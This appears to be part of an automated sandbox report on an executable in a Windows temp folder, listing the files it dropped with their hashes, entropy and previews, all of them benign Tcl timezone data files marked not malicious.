                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Tokyo)]} {. LoadTimeZoneFile Asia/Tokyo.}.set TZData(:Japan) $TZData(:Asia/Tokyo).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):184
                                                                                                                                                                                                                                                    Entropy (8bit):4.759848173726549
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Pacific/Kwajalein)]} {. LoadTimeZoneFile Pacific/Kwajalein.}.set TZData(:Kwajalein) $TZData(:Pacific/Kwajalein).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):171
                                                                                                                                                                                                                                                    Entropy (8bit):4.779409803819657
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Tripoli)]} {. LoadTimeZoneFile Africa/Tripoli.}.set TZData(:Libya) $TZData(:Africa/Tripoli).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7471
                                                                                                                                                                                                                                                    Entropy (8bit):3.7115445412724797
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:MET) {. {-9223372036854775808 3600 0 MET}. {-1693706400 7200 1 MEST}. {-1680483600 3600 0 MET}. {-1663455600 7200 1 MEST}. {-1650150000 3600 0 MET}. {-1632006000 7200 1 MEST}. {-1618700400 3600 0 MET}. {-938905200 7200 1 MEST}. {-857257200 3600 0 MET}. {-844556400 7200 1 MEST}. {-828226800 3600 0 MET}. {-812502000 7200 1 MEST}. {-796777200 3600 0 MET}. {-781052400 7200 1 MEST}. {-766623600 3600 0 MET}. {228877200 7200 1 MEST}. {243997200 3600 0 MET}. {260326800 7200 1 MEST}. {276051600 3600 0 MET}. {291776400 7200 1 MEST}. {307501200 3600 0 MET}. {323830800 7200 1 MEST}. {338950800 3600 0 MET}. {354675600 7200 1 MEST}. {370400400 3600 0 MET}. {386125200 7200 1 MEST}. {401850000 3600 0 MET}. {417574800 7200 1 MEST}. {433299600 3600 0 MET}. {449024400 7200 1 MEST}. {465354000 3600 0 MET}. {481078800 7200 1 MEST}. {496803600 3600 0 MET
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):106
                                                                                                                                                                                                                                                    Entropy (8bit):4.856431808856169
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:MST) {. {-9223372036854775808 -25200 0 MST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8227
                                                                                                                                                                                                                                                    Entropy (8bit):3.755606924782105
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:MST7MDT) {. {-9223372036854775808 -25200 0 MST}. {-1633273200 -21600 1 MDT}. {-1615132800 -25200 0 MST}. {-1601823600 -21600 1 MDT}. {-1583683200 -25200 0 MST}. {-880210800 -21600 1 MWT}. {-769395600 -21600 1 MPT}. {-765388800 -25200 0 MST}. {-84380400 -21600 1 MDT}. {-68659200 -25200 0 MST}. {-52930800 -21600 1 MDT}. {-37209600 -25200 0 MST}. {-21481200 -21600 1 MDT}. {-5760000 -25200 0 MST}. {9968400 -21600 1 MDT}. {25689600 -25200 0 MST}. {41418000 -21600 1 MDT}. {57744000 -25200 0 MST}. {73472400 -21600 1 MDT}. {89193600 -25200 0 MST}. {104922000 -21600 1 MDT}. {120643200 -25200 0 MST}. {126694800 -21600 1 MDT}. {152092800 -25200 0 MST}. {162378000 -21600 1 MDT}. {183542400 -25200 0 MST}. {199270800 -21600 1 MDT}. {215596800 -25200 0 MST}. {230720400 -21600 1 MDT}. {247046400 -25200 0 MST}. {262774800 -21600 1 MDT}. {278496000 -252
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):185
                                                                                                                                                                                                                                                    Entropy (8bit):4.836487818373659
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Tijuana)]} {. LoadTimeZoneFile America/Tijuana.}.set TZData(:Mexico/BajaNorte) $TZData(:America/Tijuana).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):186
                                                                                                                                                                                                                                                    Entropy (8bit):4.841665860441288
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Mazatlan)]} {. LoadTimeZoneFile America/Mazatlan.}.set TZData(:Mexico/BajaSur) $TZData(:America/Mazatlan).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):195
                                                                                                                                                                                                                                                    Entropy (8bit):4.8300311016675606
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Mexico_City)]} {. LoadTimeZoneFile America/Mexico_City.}.set TZData(:Mexico/General) $TZData(:America/Mexico_City).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):174
                                                                                                                                                                                                                                                    Entropy (8bit):4.8398862338201765
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Pacific/Auckland)]} {. LoadTimeZoneFile Pacific/Auckland.}.set TZData(:NZ) $TZData(:Pacific/Auckland).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):176
                                                                                                                                                                                                                                                    Entropy (8bit):4.832832776993659
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Pacific/Chatham)]} {. LoadTimeZoneFile Pacific/Chatham.}.set TZData(:NZ-CHAT) $TZData(:Pacific/Chatham).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):172
                                                                                                                                                                                                                                                    Entropy (8bit):4.80475858956378
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx06RGFwVAIg206RAO0L5vf1+IAcGE6Ru:SlSWB9IZaM3y7+SwVAIgp+iLpd+90+u
                                                                                                                                                                                                                                                    MD5:38C56298E75306F39D278F60B50711A6
                                                                                                                                                                                                                                                    SHA1:8FD9CEAD17CCD7D981CEF4E782C3916BFEF2D11F
                                                                                                                                                                                                                                                    SHA-256:E10B8574DD83C93D3C49E9E2226148CBA84538802316846E74DA6004F1D1534D
                                                                                                                                                                                                                                                    SHA-512:F6AA67D78A167E553B97F092CC3791B591F800A6D286BE37C06F7ECABDFBCF43A397AEDC6E3EB9EB6A1CB95E8883D4D4F97890CA1877930AFCD5643B0C8548E9
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Denver)]} {. LoadTimeZoneFile America/Denver.}.set TZData(:Navajo) $TZData(:America/Denver).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):166
                                                                                                                                                                                                                                                    Entropy (8bit):4.854287452296565
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8qvwVAIgNtAnL75h4WFKdv:SlSWB9IZaM3yMwVAIgEH5h4wKt
                                                                                                                                                                                                                                                    MD5:AF9DD8961DB652EE1E0495182D99820D
                                                                                                                                                                                                                                                    SHA1:979602E3C59719A67DE3C05633242C12E0693C43
                                                                                                                                                                                                                                                    SHA-256:9A6109D98B35518921E4923B50053E7DE9B007372C5E4FFF75654395D6B56A82
                                                                                                                                                                                                                                                    SHA-512:F022C3EFABFC3B3D3152C345ACD28387FFEA4B61709CBD42B2F3684D33BED469C4C25F2328E5E7D9D74D968E25A0419E7BCFF0EB55650922906B9D3FF57B06C8
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Shanghai)]} {. LoadTimeZoneFile Asia/Shanghai.}.set TZData(:PRC) $TZData(:Asia/Shanghai).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8227
                                                                                                                                                                                                                                                    Entropy (8bit):3.751820462019181
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:9d89jJC2ZCHtffWsBNwj/lpmlOxGcKcnRH31t+ucgge:49jgNf+aNwj/lpmlOxnKcndIG
                                                                                                                                                                                                                                                    MD5:DB5250A28A3853951AF00231677AACAC
                                                                                                                                                                                                                                                    SHA1:1FC1DA1121B9F5557D246396917205B97F6BC295
                                                                                                                                                                                                                                                    SHA-256:4DFC264F4564957F333C0208DA52DF03301D2FD07943F53D8B51ECCDD1CB8153
                                                                                                                                                                                                                                                    SHA-512:72594A17B1E29895A6B4FC636AAE1AB28523C9C8D50118FA5A7FDFD3944AD3B742B17B260A69B44756F4BA1671268DD3E8223EF314FF7850AFB81202BA2BBF44
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:PST8PDT) {. {-9223372036854775808 -28800 0 PST}. {-1633269600 -25200 1 PDT}. {-1615129200 -28800 0 PST}. {-1601820000 -25200 1 PDT}. {-1583679600 -28800 0 PST}. {-880207200 -25200 1 PWT}. {-769395600 -25200 1 PPT}. {-765385200 -28800 0 PST}. {-84376800 -25200 1 PDT}. {-68655600 -28800 0 PST}. {-52927200 -25200 1 PDT}. {-37206000 -28800 0 PST}. {-21477600 -25200 1 PDT}. {-5756400 -28800 0 PST}. {9972000 -25200 1 PDT}. {25693200 -28800 0 PST}. {41421600 -25200 1 PDT}. {57747600 -28800 0 PST}. {73476000 -25200 1 PDT}. {89197200 -28800 0 PST}. {104925600 -25200 1 PDT}. {120646800 -28800 0 PST}. {126698400 -25200 1 PDT}. {152096400 -28800 0 PST}. {162381600 -25200 1 PDT}. {183546000 -28800 0 PST}. {199274400 -25200 1 PDT}. {215600400 -28800 0 PST}. {230724000 -25200 1 PDT}. {247050000 -28800 0 PST}. {262778400 -25200 1 PDT}. {278499600 -288
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):5607
                                                                                                                                                                                                                                                    Entropy (8bit):3.773789776269803
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:2H8s7KAKLAYU2AQR5E/uuL6ygiNzKNZVB:2H8s7KAKg2vNE6Mw
                                                                                                                                                                                                                                                    MD5:205E5E323FB9B409A5FB6BD19C7BD2FA
                                                                                                                                                                                                                                                    SHA1:F8B1DD28CD6054F8E9EDD9F03086DA54BDB4AE89
                                                                                                                                                                                                                                                    SHA-256:0E3961DC5FEAF51021FFA9B525A50879A74B9A5FEEEAD2EF35C943F9D3107C8D
                                                                                                                                                                                                                                                    SHA-512:9D484F9E0071145399B78EA65D41ED595EBF63C6914D89278197FD2AD0AD8EE752E06D7AA7469BF1598B078311A45EA0FE25A31A676F791C6848FFD6DB2F25B1
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Apia) {. {-9223372036854775808 45184 0 LMT}. {-2855737984 -41216 0 LMT}. {-1861878784 -41400 0 WSST}. {-631110600 -39600 0 SST}. {1285498800 -36000 1 SDT}. {1301752800 -39600 0 SST}. {1316872800 -36000 1 SDT}. {1325239200 50400 0 WSDT}. {1333202400 46800 0 WSST}. {1348927200 50400 1 WSDT}. {1365256800 46800 0 WSST}. {1380376800 50400 1 WSDT}. {1396706400 46800 0 WSST}. {1411826400 50400 1 WSDT}. {1428156000 46800 0 WSST}. {1443276000 50400 1 WSDT}. {1459605600 46800 0 WSST}. {1474725600 50400 1 WSDT}. {1491055200 46800 0 WSST}. {1506175200 50400 1 WSDT}. {1522504800 46800 0 WSST}. {1538229600 50400 1 WSDT}. {1554559200 46800 0 WSST}. {1569679200 50400 1 WSDT}. {1586008800 46800 0 WSST}. {1601128800 50400 1 WSDT}. {1617458400 46800 0 WSST}. {1632578400 50400 1 WSDT}. {1648908000 46800 0 WSST}. {1664028000 50400 1 WSDT}. {1680357600
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8487
                                                                                                                                                                                                                                                    Entropy (8bit):3.8173754903771018
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:WNj7nBIc0fw4eJ7a1N1oKe13aNiWbF8sYBpYhuVn:Cmc3J7a1N18QOs8
                                                                                                                                                                                                                                                    MD5:6C008D6437C7490EE498605B5B096FDB
                                                                                                                                                                                                                                                    SHA1:D7F6E7B3920C54EFE02A44883DBCD0A75C7FC46A
                                                                                                                                                                                                                                                    SHA-256:B5BD438B748BA911E0E1201A83B623BE3F8130951C1377D278A7E7BC9CB7F672
                                                                                                                                                                                                                                                    SHA-512:DA6992D257B1BA6124E39F90DDEE17DC3E2F3B38C3A68B77A93065E3E5873D28B8AE5D21CEC223BAADFBDD1B3A735BF1CEC1BDEB0C4BEAB72AAA23433A707207
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Auckland) {. {-9223372036854775808 41944 0 LMT}. {-3192435544 41400 0 NZMT}. {-1330335000 45000 1 NZST}. {-1320057000 41400 0 NZMT}. {-1300699800 43200 1 NZST}. {-1287396000 41400 0 NZMT}. {-1269250200 43200 1 NZST}. {-1255946400 41400 0 NZMT}. {-1237800600 43200 1 NZST}. {-1224496800 41400 0 NZMT}. {-1206351000 43200 1 NZST}. {-1192442400 41400 0 NZMT}. {-1174901400 43200 1 NZST}. {-1160992800 41400 0 NZMT}. {-1143451800 43200 1 NZST}. {-1125914400 41400 0 NZMT}. {-1112607000 43200 1 NZST}. {-1094464800 41400 0 NZMT}. {-1081157400 43200 1 NZST}. {-1063015200 41400 0 NZMT}. {-1049707800 43200 1 NZST}. {-1031565600 41400 0 NZMT}. {-1018258200 43200 1 NZST}. {-1000116000 41400 0 NZMT}. {-986808600 43200 1 NZST}. {-968061600 41400 0 NZMT}. {-955359000 43200 1 NZST}. {-936612000 41400 0 NZMT}. {-923304600 43200 1 NZST}. {-757425600 43200
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):270
                                                                                                                                                                                                                                                    Entropy (8bit):4.745126801265246
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9X5Ftgm2OHHhp5PZiuoDZDVJFU8vmH9yZEiyvn:MBp5FtgmdHf5PZiDZJJK86M6iyvn
                                                                                                                                                                                                                                                    MD5:7F7DF5D1BD9A2C79E226EF29D853FF8D
                                                                                                                                                                                                                                                    SHA1:3D23FFF594A630BB639A42E152F427FF6F4EB729
                                                                                                                                                                                                                                                    SHA-256:283DE41AB82E59E88A1534F426A13B65424467CD43E259DC6E6A7DF701A41ED9
                                                                                                                                                                                                                                                    SHA-512:A095E3C104F70E4AF6591B3D93855B0EC6BC2AB6A62D024733F0F54CA6B98F299EA1BD191CAD9B79362607CF578AFE116525B134B6B2ACEA44D8B0E6FDEBAE12
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Bougainville) {. {-9223372036854775808 37336 0 LMT}. {-2840178136 35312 0 PMMT}. {-2366790512 36000 0 PGT}. {-868010400 32400 0 JST}. {-768906000 36000 0 PGT}. {1419696000 39600 0 BST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7907
                                                                                                                                                                                                                                                    Entropy (8bit):3.899106983650024
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:h6x7dZGlv6WzAqqHqZnKNzBXaQY6CVXbiMKOVw:hEZqzAqqHqUYFVE
                                                                                                                                                                                                                                                    MD5:5F0C1926AD549023C3E68D28C874134A
                                                                                                                                                                                                                                                    SHA1:281B94053A4BEA7F527735CF207C4C9E9B997A50
                                                                                                                                                                                                                                                    SHA-256:F7A19012786B379DC3D1F6B367B30A065AD61EB814725D8232C221DEC4C4CF97
                                                                                                                                                                                                                                                    SHA-512:D5F9FB2DFC49C575619FC5386B4A523E0C74D13A7D9F46FF4C3B1A02000DE386E8C57655816FF45ECDFACCC5639B259BBBC9822D845C00B408122193B2B852B0
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Chatham) {. {-9223372036854775808 44028 0 LMT}. {-3192437628 44100 0 CHAST}. {-757426500 45900 0 CHAST}. {152632800 49500 1 CHADT}. {162309600 45900 0 CHAST}. {183477600 49500 1 CHADT}. {194968800 45900 0 CHAST}. {215532000 49500 1 CHADT}. {226418400 45900 0 CHAST}. {246981600 49500 1 CHADT}. {257868000 45900 0 CHAST}. {278431200 49500 1 CHADT}. {289317600 45900 0 CHAST}. {309880800 49500 1 CHADT}. {320767200 45900 0 CHAST}. {341330400 49500 1 CHADT}. {352216800 45900 0 CHAST}. {372780000 49500 1 CHADT}. {384271200 45900 0 CHAST}. {404834400 49500 1 CHADT}. {415720800 45900 0 CHAST}. {436284000 49500 1 CHADT}. {447170400 45900 0 CHAST}. {467733600 49500 1 CHADT}. {478620000 45900 0 CHAST}. {499183200 49500 1 CHADT}. {510069600 45900 0 CHAST}. {530632800 49500 1 CHADT}. {541519200 45900 0 CHAST}. {562082400 49500 1 CHADT}. {5735736
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):146
                                                                                                                                                                                                                                                    Entropy (8bit):5.020357159210726
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Chuuk) {. {-9223372036854775808 36428 0 LMT}. {-2177489228 36000 0 CHUT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3067
                                                                                                                                                                                                                                                    Entropy (8bit):3.897391556748606
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Easter) {. {-9223372036854775808 -26248 0 LMT}. {-2524495352 -26248 0 EMT}. {-1178124152 -25200 0 EAST}. {-36619200 -21600 1 EASST}. {-23922000 -25200 0 EAST}. {-3355200 -21600 1 EASST}. {7527600 -25200 0 EAST}. {24465600 -21600 1 EASST}. {37767600 -25200 0 EAST}. {55915200 -21600 1 EASST}. {69217200 -25200 0 EAST}. {87969600 -21600 1 EASST}. {100666800 -25200 0 EAST}. {118209600 -21600 1 EASST}. {132116400 -25200 0 EAST}. {150868800 -21600 1 EASST}. {163566000 -25200 0 EAST}. {182318400 -21600 1 EASST}. {195620400 -25200 0 EAST}. {213768000 -21600 1 EASST}. {227070000 -25200 0 EAST}. {245217600 -21600 1 EASST}. {258519600 -25200 0 EAST}. {277272000 -21600 1 EASST}. {289969200 -25200 0 EAST}. {308721600 -21600 1 EASST}. {321418800 -25200 0 EAST}. {340171200 -21600 1 EASST}. {353473200 -25200 0 EAST}. {371620800 -21600 1 EASST}. {3
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):715
                                                                                                                                                                                                                                                    Entropy (8bit):4.173737610787593
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Efate) {. {-9223372036854775808 40396 0 LMT}. {-1829387596 39600 0 VUT}. {433256400 43200 1 VUST}. {448977600 39600 0 VUT}. {467298000 43200 1 VUST}. {480427200 39600 0 VUT}. {496760400 43200 1 VUST}. {511876800 39600 0 VUT}. {528210000 43200 1 VUST}. {543931200 39600 0 VUT}. {559659600 43200 1 VUST}. {575380800 39600 0 VUT}. {591109200 43200 1 VUST}. {606830400 39600 0 VUT}. {622558800 43200 1 VUST}. {638280000 39600 0 VUT}. {654008400 43200 1 VUST}. {669729600 39600 0 VUT}. {686062800 43200 1 VUST}. {696340800 39600 0 VUT}. {719931600 43200 1 VUST}. {727790400 39600 0 VUT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):211
                                                                                                                                                                                                                                                    Entropy (8bit):4.866634190114019
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Enderbury) {. {-9223372036854775808 -41060 0 LMT}. {-2177411740 -43200 0 PHOT}. {307627200 -39600 0 PHOT}. {788958000 46800 0 PHOT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):178
                                                                                                                                                                                                                                                    Entropy (8bit):4.891537262328573
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Fakaofo) {. {-9223372036854775808 -41096 0 LMT}. {-2177411704 -39600 0 TKT}. {1325242800 46800 0 TKT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):5598
                                                                                                                                                                                                                                                    Entropy (8bit):3.7649248908751147
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Fiji) {. {-9223372036854775808 42944 0 LMT}. {-1709985344 43200 0 FJT}. {909842400 46800 1 FJST}. {920124000 43200 0 FJT}. {941896800 46800 1 FJST}. {951573600 43200 0 FJT}. {1259416800 46800 1 FJST}. {1269698400 43200 0 FJT}. {1287842400 46800 1 FJST}. {1299333600 43200 0 FJT}. {1319292000 46800 1 FJST}. {1327154400 43200 0 FJT}. {1350741600 46800 1 FJST}. {1358604000 43200 0 FJT}. {1382796000 46800 1 FJST}. {1390050000 43200 0 FJT}. {1414850400 46800 1 FJST}. {1421503200 43200 0 FJT}. {1446300000 46800 1 FJST}. {1452952800 43200 0 FJT}. {1478354400 46800 1 FJST}. {1484402400 43200 0 FJT}. {1509804000 46800 1 FJST}. {1516456800 43200 0 FJT}. {1541253600 46800 1 FJST}. {1547906400 43200 0 FJT}. {1572703200 46800 1 FJST}. {1579356000 43200 0 FJT}. {1604152800 46800 1 FJST}. {1610805600 43200 0 FJT}. {1636207200 46800 1 FJST}. {1
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):148
                                                                                                                                                                                                                                                    Entropy (8bit):4.985758985032215
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Funafuti) {. {-9223372036854775808 43012 0 LMT}. {-2177495812 43200 0 TVT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):181
